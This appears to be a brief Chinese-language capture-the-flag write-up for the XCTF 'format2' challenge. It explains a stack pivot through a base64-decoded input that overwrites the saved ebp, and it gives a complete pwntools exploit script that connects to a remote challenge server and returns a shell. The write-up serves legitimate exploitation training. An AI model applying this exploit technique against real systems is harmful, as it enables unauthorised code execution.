xctf format2

日常水题的一天这个和pwnable.kr 上的一道题很像也是一道栈迁移的题目
我们直接看main函数

把输入的base64解密长度不能超过12

目的是correct函数

发现这里可以覆盖ebp我们就可以将栈迁移到input处然后mov esp,ebp ;
pop ebp; pop eip;main函数公用ebp控制eip为我们的后门地址直接拿到shell(打pwn不要限制于拿到shell哦)
exp:

from pwn import *
import base64
#p=process('./fmt')
p=remote('111.198.29.45',49541)
elf=ELF('./fmt')
def debug():
	gdb.attach(p)
	pause()
system_addr=0x08049284
input_addr=0x0811EB40
payload='a'*4+p32(system_addr)+p32(input_addr)
#debug()
p.sendline(base64.b64encode(payload))

p.interactive()

我虽然pwn不厉害
但是我基础的还是会一点的